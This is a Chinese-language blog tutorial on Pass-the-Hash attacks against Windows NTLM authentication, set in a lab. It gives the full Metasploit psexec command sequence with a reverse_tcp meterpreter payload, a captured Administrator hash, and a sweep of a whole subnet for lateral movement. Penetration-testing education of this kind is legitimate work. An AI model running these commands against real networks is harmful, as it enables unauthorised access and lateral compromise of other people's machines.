天天看点

哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

目录

一. 哈希传递攻击

MSF进行哈希传递攻击

一. 哈希传递攻击

接上一篇我们获取到了哈希值并对哈希值进行破解 Pass-the-Hash攻击,但是破解不出来咋办?哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。

哈希传递攻击适用情况:

在工作组环境中:

  • Windows Vista之前的机器,可以使用本地管理员组内用户进行攻击。
  • Windows Vista之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

在域环境中:

  • 只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。

MSF进行哈希传递攻击

有些时候,当我们获取到了某台主机的administrator 用户的密码哈希值,并且该主机的445端口打开着。我们则可以利用exploitlwindows/smb/psexec模块用MSF进行远程登录(哈希传递攻击),这个利用跟工作组环境或者域环境无关,即在工作组环境中也是可以利用的。这个是rhost可以是一个主机,也可以设置一个网段。

这里目标主机的WindowsVista之后的机器,所以只能使用administrator用户进行攻击。

1. win7实验

(1)使用administrator用户进行攻击

加入了域环境

使用的本地administrator进行登录

提权到system获取到了hash值:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::

哈希传递攻击如下

use  exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.4
set rhost 192.168.1.7
set smbuser Administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942   #这里LM和NTLM我们已经获取到了
exploit 
           
哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

攻击结果如下,成功进行了登录

哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

此时可以进行哈希传递,如本地与win7同网段的还有一个win2012机器,由于方便管理win2012的账号密码和win7是一样的,所以我们利用哈希传递尝试进行登录win2012。

将目标机器换成win2012的ip

set rhosts 192.168.1.6
           

如下,成功登录win2012,这就是哈希传递攻击

哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

如果是在真实环境中,我们可以将rhosts换成一个ip地址段,如下

set rhosts 192.168.1.0-192.168.1.10
或者
set rhosts 192.168.1.0/24
           
哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

程序在一个个尝试进行登录,如下是登录成功的

哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

(2)使用本地普通用户进行攻击

使用本地普通用户哈希传递攻击是不行的。

哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击
哈希传递攻击(Pass-the-Hash)一. 哈希传递攻击

持续更新....